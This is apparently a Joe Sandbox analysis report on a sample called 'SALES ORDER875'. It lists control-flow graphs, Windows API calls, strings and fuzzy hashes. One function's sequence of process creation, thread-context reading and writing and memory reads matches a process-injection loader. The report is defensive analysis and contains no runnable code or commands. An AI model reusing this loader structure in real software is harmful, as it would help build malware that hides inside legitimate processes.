                                                                                                                                                                                    control_flow_graph 650 383170-383185 651 3831e5-3831e7 650->651 652 383187-38318a 650->652 651->652 653 3831e9 651->653 654 3831eb 652->654 655 38318c-383193 652->655 656 3831d0-3831d8 DefWindowProcW 653->656 657 3c2dfb-3c2e23 call 3818e2 call 39e499 654->657 658 3831f1-3831f6 654->658 659 383199-38319e 655->659 660 383265-38326d PostQuitMessage 655->660 667 3831de-3831e4 656->667 696 3c2e28-3c2e2f 657->696 662 3831f8-3831fb 658->662 663 38321d-383244 SetTimer RegisterWindowMessageW 658->663 665 3c2e7c-3c2e90 call 3ebf30 659->665 666 3831a4-3831a8 659->666 661 383219-38321b 660->661 661->667 668 3c2d9c-3c2d9f 662->668 669 383201-383214 KillTimer call 3830f2 call 383c50 662->669 663->661 671 383246-383251 CreatePopupMenu 663->671 665->661 691 3c2e96 665->691 672 3c2e68-3c2e72 call 3ec161 666->672 673 3831ae-3831b3 666->673 675 3c2dd7-3c2df6 MoveWindow 668->675 676 3c2da1-3c2da5 668->676 669->661 671->661 687 3c2e77 672->687 680 3c2e4d-3c2e54 673->680 681 3831b9-3831be 673->681 675->661 683 3c2dc6-3c2dd2 SetFocus 676->683 684 3c2da7-3c2daa 676->684 680->656 685 3c2e5a-3c2e63 call 3e0ad7 680->685 689 383253-383263 call 38326f 681->689 690 3831c4-3831ca 681->690 683->661 684->690 692 3c2db0-3c2dc1 call 3818e2 684->692 685->656 687->661 689->661 690->656 690->696 691->656 692->661 696->656 700 3c2e35-3c2e48 call 3830f2 call 383837 696->700 700->656
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0038316A,?,?), ref: 003831D8
                                                                                                                                                                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,0038316A,?,?), ref: 00383204
                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00383227
                                                                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0038316A,?,?), ref: 00383232
                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00383246
                                                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00383267
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                    • String ID: TaskbarCreated
                                                                                                                                                                                    • API String ID: 129472671-2362178303
                                                                                                                                                                                    • Opcode ID: fda11bdd7ae5c5ec78ade198253a6c6cb70699d4e479d1b317775d732bafaa68
                                                                                                                                                                                    • Instruction ID: abed95339812c5a25220dd5156518e9db904aa310f75ab8630b28c07617d01f4
                                                                                                                                                                                    • Opcode Fuzzy Hash: fda11bdd7ae5c5ec78ade198253a6c6cb70699d4e479d1b317775d732bafaa68
                                                                                                                                                                                    • Instruction Fuzzy Hash: 32411331240304A6DB173B78DC5DBBE3A19EB05F01F0441BAF9128A7E2CBA0DE40C769
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: D%E$D%E$D%E$D%E$D%ED%E$Variable must be of type 'Object'.
                                                                                                                                                                                    • API String ID: 0-3493204988
                                                                                                                                                                                    • Opcode ID: 43fdfb74e818bddff90e8c69e48f6be460232d331bdb25a61c9a6e15955b56e2
                                                                                                                                                                                    • Instruction ID: ec422aadc66c12959827383fe0b47a381a8adc1c5deb1e1562fe10ee703a9250
                                                                                                                                                                                    • Opcode Fuzzy Hash: 43fdfb74e818bddff90e8c69e48f6be460232d331bdb25a61c9a6e15955b56e2
                                                                                                                                                                                    • Instruction Fuzzy Hash: C2C2BC75A00315CFCB26EF58D880AADB7B5FF09300F2585AAE906AB391D375ED41CB91

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1216 1a90300-1a903ae call 1a8dd30 1219 1a903b5-1a903db call 1a91210 CreateFileW 1216->1219 1222 1a903dd 1219->1222 1223 1a903e2-1a903f2 1219->1223 1224 1a9052d-1a90531 1222->1224 1231 1a903f9-1a90413 VirtualAlloc 1223->1231 1232 1a903f4 1223->1232 1225 1a90573-1a90576 1224->1225 1226 1a90533-1a90537 1224->1226 1228 1a90579-1a90580 1225->1228 1229 1a90539-1a9053c 1226->1229 1230 1a90543-1a90547 1226->1230 1233 1a90582-1a9058d 1228->1233 1234 1a905d5-1a905ea 1228->1234 1229->1230 1235 1a90549-1a90553 1230->1235 1236 1a90557-1a9055b 1230->1236 1237 1a9041a-1a90431 ReadFile 1231->1237 1238 1a90415 1231->1238 1232->1224 1239 1a9058f 1233->1239 1240 1a90591-1a9059d 1233->1240 1241 1a905fa-1a90602 1234->1241 1242 1a905ec-1a905f7 VirtualFree 1234->1242 1235->1236 1243 1a9056b 1236->1243 1244 1a9055d-1a90567 1236->1244 1245 1a90438-1a90478 VirtualAlloc 1237->1245 1246 1a90433 1237->1246 1238->1224 1239->1234 1249 1a9059f-1a905af 1240->1249 1250 1a905b1-1a905bd 1240->1250 1242->1241 1243->1225 1244->1243 1247 1a9047a 1245->1247 1248 1a9047f-1a9049a call 1a91460 1245->1248 1246->1224 1247->1224 1256 1a904a5-1a904af 1248->1256 1252 1a905d3 1249->1252 1253 1a905ca-1a905d0 1250->1253 1254 1a905bf-1a905c8 1250->1254 1252->1228 1253->1252 1254->1252 1257 1a904b1-1a904e0 call 1a91460 1256->1257 1258 1a904e2-1a904f6 call 1a91270 1256->1258 1257->1256 1264 1a904f8 1258->1264 1265 1a904fa-1a904fe 1258->1265 1264->1224 1266 1a9050a-1a9050e 1265->1266 1267 1a90500-1a90504 CloseHandle 1265->1267 1268 1a9051e-1a90527 1266->1268 1269 1a90510-1a9051b VirtualFree 1266->1269 1267->1266 1268->1219 1268->1224 1269->1268
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01A903D1
                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01A905F7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1832043021.0000000001A8D000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A8D000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1a8d000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFileFreeVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 204039940-0
                                                                                                                                                                                    • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                                                                                                                                    • Instruction ID: 20c8f0f5e15091f5d5a5e74d8b32d84dccde7ad4e53e79840c093d60eca44790
                                                                                                                                                                                    • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4BA10A74E00209EBDF14CFA4C994BEEBBB9FF48304F208559E605BB281D7759A81CB55

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1280 382c63-382cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00382C91
                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00382CB2
                                                                                                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00381CAD,?), ref: 00382CC6
                                                                                                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00381CAD,?), ref: 00382CCF
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$CreateShow
                                                                                                                                                                                    • String ID: AutoIt v3$edit
                                                                                                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                                                                                                    • Opcode ID: 91f8d175227b2e9be953bf30f67e74c8e4b6268c80fdb2496333661eeed3de22
                                                                                                                                                                                    • Instruction ID: de3827d83ae09b94fec85d39b6be8aeba9c60e9b8428fdeccb15a300fd0440cd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 91f8d175227b2e9be953bf30f67e74c8e4b6268c80fdb2496333661eeed3de22
                                                                                                                                                                                    • Instruction Fuzzy Hash: 85F03A755803907AFB300713AC58FB72FBDD7C6F61F01402AFD00A21B1C2658840DAB8

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1395 1a900e0-1a901f8 call 1a8dd30 call 1a8ffd0 CreateFileW 1402 1a901fa 1395->1402 1403 1a901ff-1a9020f 1395->1403 1404 1a902af-1a902b4 1402->1404 1406 1a90211 1403->1406 1407 1a90216-1a90230 VirtualAlloc 1403->1407 1406->1404 1408 1a90232 1407->1408 1409 1a90234-1a9024b ReadFile 1407->1409 1408->1404 1410 1a9024d 1409->1410 1411 1a9024f-1a90289 call 1a90010 call 1a8efd0 1409->1411 1410->1404 1416 1a9028b-1a902a0 call 1a90060 1411->1416 1417 1a902a5-1a902ad ExitProcess 1411->1417 1416->1417 1417->1404
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 01A8FFD0: Sleep.KERNELBASE(000001F4), ref: 01A8FFE1
                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01A901EE
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1832043021.0000000001A8D000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A8D000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1a8d000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFileSleep
                                                                                                                                                                                    • String ID: BV0BR7A0TNZ51M4V59
                                                                                                                                                                                    • API String ID: 2694422964-2229067778
                                                                                                                                                                                    • Opcode ID: e861c83f5ba3909f6175e514a2916075fae28d66f4fd3ba59bb81d1bc232324c
                                                                                                                                                                                    • Instruction ID: 1f1ec1a4f4be33e5bc7207750c941dc1ce66c9139ddbe7f07078a76206b299f3
                                                                                                                                                                                    • Opcode Fuzzy Hash: e861c83f5ba3909f6175e514a2916075fae28d66f4fd3ba59bb81d1bc232324c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 79518130D04249DAEF11DBE4C914BEFBBB9AF14300F044199E248BB2C1DAB91B49CBA5

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1729 383b1c-383b27 1730 383b99-383b9b 1729->1730 1731 383b29-383b2e 1729->1731 1732 383b8c-383b8f 1730->1732 1731->1730 1733 383b30-383b48 RegOpenKeyExW 1731->1733 1733->1730 1734 383b4a-383b69 RegQueryValueExW 1733->1734 1735 383b6b-383b76 1734->1735 1736 383b80-383b8b RegCloseKey 1734->1736 1737 383b78-383b7a 1735->1737 1738 383b90-383b97 1735->1738 1736->1732 1739 383b7e 1737->1739 1738->1739 1739->1736
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00383B0F,SwapMouseButtons,00000004,?), ref: 00383B40
                                                                                                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00383B0F,SwapMouseButtons,00000004,?), ref: 00383B61
                                                                                                                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00383B0F,SwapMouseButtons,00000004,?), ref: 00383B83
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                                    • String ID: Control Panel\Mouse
                                                                                                                                                                                    • API String ID: 3677997916-824357125
                                                                                                                                                                                    • Opcode ID: 8346d4fc6169cecd51ef6587d42edc9069b3008ae3319da10552579f7d264aea
                                                                                                                                                                                    • Instruction ID: 9d4e1fe7a2b8670eb0218f268b88228d864ca1b3828a557343a1d309a90d2f28
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8346d4fc6169cecd51ef6587d42edc9069b3008ae3319da10552579f7d264aea
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D112AB5510208FFDB22DFA5DC84AEEBBBCEF04B84B1184A9A805D7210E2319F409764

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1740 1a8efd0-1a8f070 call 1a91440 * 3 1747 1a8f072-1a8f07c 1740->1747 1748 1a8f087 1740->1748 1747->1748 1750 1a8f07e-1a8f085 1747->1750 1749 1a8f08e-1a8f097 1748->1749 1751 1a8f09e-1a8f750 1749->1751 1750->1749 1752 1a8f752-1a8f756 1751->1752 1753 1a8f763-1a8f790 CreateProcessW 1751->1753 1754 1a8f758-1a8f75c 1752->1754 1755 1a8f79c-1a8f7c9 1752->1755 1761 1a8f79a 1753->1761 1762 1a8f792-1a8f795 1753->1762 1756 1a8f75e 1754->1756 1757 1a8f7d5-1a8f802 1754->1757 1775 1a8f7cb-1a8f7ce 1755->1775 1776 1a8f7d3 1755->1776 1759 1a8f80c-1a8f826 Wow64GetThreadContext 1756->1759 1757->1759 1782 1a8f804-1a8f807 1757->1782 1764 1a8f828 1759->1764 1765 1a8f82d-1a8f848 ReadProcessMemory 1759->1765 1761->1759 1763 1a8fb91-1a8fb93 1762->1763 1769 1a8fb3a-1a8fb3e 1764->1769 1767 1a8f84a 1765->1767 1768 1a8f84f-1a8f858 1765->1768 1767->1769 1771 1a8f85a-1a8f869 1768->1771 1772 1a8f881-1a8f8a0 call 1a90ac0 1768->1772 1773 1a8fb8f 1769->1773 1774 1a8fb40-1a8fb44 1769->1774 1771->1772 1778 1a8f86b-1a8f87a call 1a90a10 1771->1778 1789 1a8f8a2 1772->1789 1790 1a8f8a7-1a8f8ca call 1a90c00 1772->1790 1773->1763 1779 1a8fb59-1a8fb5d 1774->1779 1780 1a8fb46-1a8fb52 1774->1780 1775->1763 1776->1759 1778->1772 1795 1a8f87c 1778->1795 1785 1a8fb69-1a8fb6d 1779->1785 1786 1a8fb5f-1a8fb62 1779->1786 1780->1779 1782->1759 1782->1763 1791 1a8fb79-1a8fb7d 1785->1791 1792 1a8fb6f-1a8fb72 1785->1792 1786->1785 1789->1769 1799 1a8f8cc-1a8f8d3 1790->1799 1800 1a8f914-1a8f935 call 1a90c00 1790->1800 1793 1a8fb8a-1a8fb8d 1791->1793 1794 1a8fb7f-1a8fb85 call 1a90a10 1791->1794 1792->1791 1793->1763 1794->1793 1795->1769 1802 1a8f90f 1799->1802 1803 1a8f8d5-1a8f8ff call 1a90c00 1799->1803 1807 1a8f93c-1a8f95a call 1a91460 1800->1807 1808 1a8f937 1800->1808 1802->1769 1806 1a8f904-1a8f906 1803->1806 1809 1a8f908 1806->1809 1810 1a8f90d 1806->1810 1813 1a8f965-1a8f96f 1807->1813 1808->1769 1809->1769 1810->1800 1814 1a8f971-1a8f9a3 call 1a91460 1813->1814 1815 1a8f9a5-1a8f9a9 1813->1815 1814->1813 1816 1a8f9af-1a8f9bf 1815->1816 1817 1a8fa94-1a8fab1 call 1a90610 1815->1817 1816->1817 1820 1a8f9c5-1a8f9d5 1816->1820 1825 1a8fab8-1a8fad7 Wow64SetThreadContext 1817->1825 1826 1a8fab3 1817->1826 1820->1817 1823 1a8f9db-1a8f9ff 1820->1823 1827 1a8fa02-1a8fa06 1823->1827 1828 1a8fad9 1825->1828 1829 1a8fadb-1a8fae6 call 1a90940 1825->1829 1826->1769 1827->1817 1830 1a8fa0c-1a8fa21 1827->1830 1828->1769 1836 1a8fae8 1829->1836 1837 1a8faea-1a8faee 1829->1837 1832 1a8fa35-1a8fa39 1830->1832 1834 1a8fa3b-1a8fa47 1832->1834 1835 1a8fa77-1a8fa8f 1832->1835 1838 1a8fa49-1a8fa73 1834->1838 1839 1a8fa75 1834->1839 1835->1827 1836->1769 1840 1a8fafa-1a8fafe 1837->1840 1841 1a8faf0-1a8faf3 1837->1841 1838->1839 1839->1832 1843 1a8fb0a-1a8fb0e 1840->1843 1844 1a8fb00-1a8fb03 1840->1844 1841->1840 1845 1a8fb1a-1a8fb1e 1843->1845 1846 1a8fb10-1a8fb13 1843->1846 1844->1843 1847 1a8fb2b-1a8fb34 1845->1847 1848 1a8fb20-1a8fb26 call 1a90a10 1845->1848 1846->1845 1847->1751 1847->1769 1848->1847
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 01A8F78B
                                                                                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01A8F821
                                                                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01A8F843
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1832043021.0000000001A8D000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A8D000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1a8d000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2438371351-0
                                                                                                                                                                                    • Opcode ID: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                                                                                                                                    • Instruction ID: 0d9027096125e0f7e6ed93fad29abc90606eb2bc55241d9ab2f2888780ad8363
                                                                                                                                                                                    • Opcode Fuzzy Hash: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                                                                                                                                    • Instruction Fuzzy Hash: D4621B30A14259DBEB24DFA4C850BDEB776EF58300F1091A9D20DEB390E7799E81CB59

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1850 382de3-382e03 call 3c1f50 1853 382e09-382e2c call 383aa2 call 382da5 call 383598 call 3844a8 1850->1853 1854 3c2c2b-3c2c94 call 3a2340 GetOpenFileNameW 1850->1854 1868 382e31-382e34 1853->1868 1860 3c2c9d-3c2ca6 call 386b57 1854->1860 1861 3c2c96 1854->1861 1864 3c2cab 1860->1864 1861->1860 1864->1864
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 003C2C8C
                                                                                                                                                                                      • Part of subcall function 00383AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00383A97,?,?,00382E7F,?,?,?,00000000), ref: 00383AC2
                                                                                                                                                                                      • Part of subcall function 00382DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00382DC4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                    • String ID: X$`eD
                                                                                                                                                                                    • API String ID: 779396738-3237845557
                                                                                                                                                                                    • Opcode ID: 8c80b7fba33cb211d802916a2a77817d61c96b8f12bea27ae93f0e71742aebd8
                                                                                                                                                                                    • Instruction ID: 295ad3bdb25a758b3e2c48195de5a69a4d09ff01621ff75864e23183a72db7ac
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c80b7fba33cb211d802916a2a77817d61c96b8f12bea27ae93f0e71742aebd8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7021D570A003589FDF02EF94C845BEE7BFCAF49714F00805AE405EB241DBB89A498F65
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 003A0668
                                                                                                                                                                                      • Part of subcall function 003A32A4: RaiseException.KERNEL32(?,?,?,003A068A,?,00451444,?,?,?,?,?,?,003A068A,00381129,00448738,00381129), ref: 003A3304
                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 003A0685
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                    • String ID: Unknown exception
                                                                                                                                                                                    • API String ID: 3476068407-410509341
                                                                                                                                                                                    • Opcode ID: b16682605559ab38c21fc5d6204848629f9cf212ab7cab229d457460b8d826ed
                                                                                                                                                                                    • Instruction ID: 3ace01534f46ca3c2d8682d63174c7bbb8f12d74be368d6d48a53fd9c8668ea9
                                                                                                                                                                                    • Opcode Fuzzy Hash: b16682605559ab38c21fc5d6204848629f9cf212ab7cab229d457460b8d826ed
                                                                                                                                                                                    • Instruction Fuzzy Hash: B1F04630C0020C77CF0AB6A4DC46D9E776CDE02344B604431B814CA4E1EF70EA29C6C0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 004082F5
                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 004082FC
                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 004084DD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 146820519-0
                                                                                                                                                                                    • Opcode ID: 4ef3b977afd325ad02152063588bb3cf1f1c6395f9980a801c6c8416359fe9b9
                                                                                                                                                                                    • Instruction ID: baaf594b51b7a5a174025ade88be74f2eb3f98f16042bc249c96249553ea3e71
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ef3b977afd325ad02152063588bb3cf1f1c6395f9980a801c6c8416359fe9b9
                                                                                                                                                                                    • Instruction Fuzzy Hash: E9127C719083019FC714DF28C584B2ABBE1BF84318F14896EE9899B392DB35ED45CF96
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00381BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00381BF4
                                                                                                                                                                                      • Part of subcall function 00381BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00381BFC
